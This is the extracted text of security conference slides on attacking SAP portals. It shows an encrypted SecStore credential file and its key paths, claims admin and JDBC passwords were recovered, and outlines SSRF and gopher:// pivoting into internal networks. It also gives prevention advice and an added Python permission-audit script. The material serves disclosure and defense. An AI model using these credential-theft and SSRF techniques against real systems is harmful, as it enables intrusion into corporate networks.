![Page 63: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/63.jpg)
SecStore.properties

```properties
$internal/version=Ni4zFF4wMSeaseforCCMxegAfx
admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS
admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgqDp+QD04b0Fh
jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH
admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ
$internal/check=BJRrz�eUA+bw4XCzdz16zX78u�t
$internal/mode=encrypted
admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E
```
![Page 64: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/64.jpg)
config.properties

```properties
rdbms.maximum_connections=5
system.name=TTT
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key
secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.properties
secstorefs.lib=/oracle/TTT/sapmnt/global/security/lib
rdbms.driverLocation=/oracle/client/10x_64/instantclient/ojdbc14.jar
rdbms.connection=jdbc/pool/TTT
rdbms.initial_connections=1
```
![Page 65: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/65.jpg)
Get the password
• We have an encrypted password • We have a key to decrypt it
We got the J2EE admin and JDBC login:password!
65
![Page 66: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/66.jpg)
Prevention
• Install SAP note 1619539
• Restrict read access to the files SecStore.properties and SecStore.key
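Added example (not from the slides) for the second prevention point: a Python check that follows config.properties to the secstorefs.keyfile and secstorefs.secfile paths, lists which SecStore entries are stored secrets, and reports either file when group or others can read it, since both files readable together is exactly what the attack needs. The demo() layout and file modes are constructed in a temporary directory; the SecStore lines reuse the ciphertexts from slide 63. Nothing here decrypts anything.

```python
"""Added example, not from the slides: audit the SecStore key/secret file
pair that the talk reads via traversal or XXE. Demo layout is constructed."""
import os
import stat
import tempfile
from pathlib import Path


def parse_properties(text):
    """Minimal Java .properties reader: key=value lines, '#'/'!' comments."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!" or "=" not in line:
            continue
        key, value = line.split("=", 1)
        props[key.strip()] = value.strip()
    return props


def secstore_summary(secstore_text):
    """Return (mode, {entry: ciphertext}) for a SecStore.properties file.
    '$internal/*' keys are bookkeeping; everything else is a stored secret."""
    props = parse_properties(secstore_text)
    secrets = {k: v for k, v in props.items() if not k.startswith("$internal/")}
    return props.get("$internal/mode"), secrets


def check_secstore_exposure(config_path):
    """Resolve key and secret file from config.properties and flag any that
    group or others can read. Owner-only (0600) is the expected state."""
    cfg = parse_properties(Path(config_path).read_text())
    findings = []
    for key in ("secstorefs.keyfile", "secstorefs.secfile"):
        path = cfg.get(key)
        if not path:
            findings.append(f"{key} missing from {config_path}")
            continue
        try:
            mode = os.stat(path).st_mode
        except FileNotFoundError:
            findings.append(f"{key}: {path} not found")
            continue
        if mode & (stat.S_IRGRP | stat.S_IROTH):
            findings.append(f"{key}: {path} readable by group/other ({stat.filemode(mode)})")
    return findings


# Lines taken from slide 63 (ciphertexts, not plaintext).
SAMPLE_SECSTORE = """$internal/version=Ni4zFF4wMSeaseforCCMxegAfx
$internal/mode=encrypted
admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS
admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E
jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH
"""


def demo():
    """Constructed layout: SecStore.key left world-readable (0644), the
    secret file correctly 0600. Returns the findings for that state."""
    root = Path(tempfile.mkdtemp())
    key, sec, cfg = root / "SecStore.key", root / "SecStore.properties", root / "config.properties"
    key.write_bytes(b"\x00" * 24)          # placeholder bytes, not a real key
    sec.write_text(SAMPLE_SECSTORE)
    cfg.write_text(f"system.name=TTT\nsecstorefs.keyfile={key}\nsecstorefs.secfile={sec}\n")
    os.chmod(key, 0o644)
    os.chmod(sec, 0o600)
    return check_secstore_exposure(cfg)


if __name__ == "__main__":
    mode, secrets = secstore_summary(SAMPLE_SECSTORE)
    print(mode, sorted(secrets))
    for finding in demo():
        print(finding)
```

The check looks only at the two files config.properties points to; on a real system the same test belongs on every copy under /usr/sap/<SID>/SYS/global/security/data and on any backup that carries them, because a readable key beside a readable secret store is the whole attack.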
![Page 67: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/67.jpg)
Portal post exploitaEon
• Lot of links to other systems in corporate LAN • Using SSRF, aUackers can get access to these systems
What is SSRF?
67
![Page 68: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/68.jpg)
SSRF History: Basics
• We send Packet A to Service A • Service A ini8ates Packet B to service B • Services can be on the same or different hosts • We can manipulate some fields of packet B within packet A • Various SSRF aUacks depend on how many fields we can
control on packet B
Packet A
Packet B
68
![Page 69: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/69.jpg)
Partial Remote SSRF: HTTP attacks on other services
(Diagram: HTTP server A is reachable from outside; server B sits in the corporate network. Direct attack: GET /vuln.jsp to A. SSRF attack: a request to A makes A send GET /vuln.jsp to B.)
![Page 70: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/70.jpg)
Gopher uri scheme
• Using the gopher:// URI scheme, it is possible to send arbitrary TCP packets
– Exploit OS vulnerabilities
– Exploit old SAP application vulnerabilities
– Bypass SAP security restrictions
– Exploit vulnerabilities in local services
More info in our BH2012 presentation: SSRF vs. Business Critical Applications
http://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-Businness-critical-applications-whitepaper.pdf
![Page 71: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/71.jpg)
Portal post-‐exploitaEon
![Page 72: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/72.jpg)
Conclusion
It is possible to protect yourself from these kinds of issues, and we are working closely with SAP to keep customers secure
It's all in your hands:
• SAP Guides
• Regular security assessments
• ABAP code review
• Monitoring technical security
• Segregation of Duties
![Page 73: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/73.jpg)
Future work
Many of the researched issues cannot be disclosed now because of our good relationship with the SAP Security Response Team, whom I would like to thank for their cooperation. However, if you want to be the first to see new attacks and demos, follow us at @erpscan and attend future presentations:
• November 9 – POC (Korea, Seoul)
• November 20 – ZeroNights (Russia, Moscow)
• November 29 – DeepSEC (Austria, Vienna)